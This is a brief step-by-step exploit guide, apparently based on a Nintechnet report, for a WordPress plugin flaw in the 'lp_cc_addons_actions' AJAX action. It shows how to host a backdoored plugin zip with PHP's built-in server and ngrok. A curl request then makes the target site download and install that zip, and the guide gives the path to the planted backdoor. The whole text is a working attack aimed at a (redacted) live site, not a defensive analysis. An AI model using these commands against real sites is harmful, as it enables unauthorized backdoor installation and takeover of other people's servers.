Reference: Nintechnet
- Download, Wordpress Plugins With Backdoor
- Create Directory and move downloaded file to created directory.
- Create Server with PHP, and ngrok for public access. PHP:
php -S localhost:8888 -t /path/to/directory
open another terminal for ngrok. NGROK:
ngrok http 8888
Make Post request to redacted.
curl http://redacted.com/wp-admin/admin-ajax.php -F "action=lp_cc_addons_actions" -F "ccAction=install" -F "ccDestin=external" -F "ccFileUrl=NGROK_URL/ZIPFILE
if Success you can access the backdoor in redacted.com/wp-content/plugins/ninja/ninja..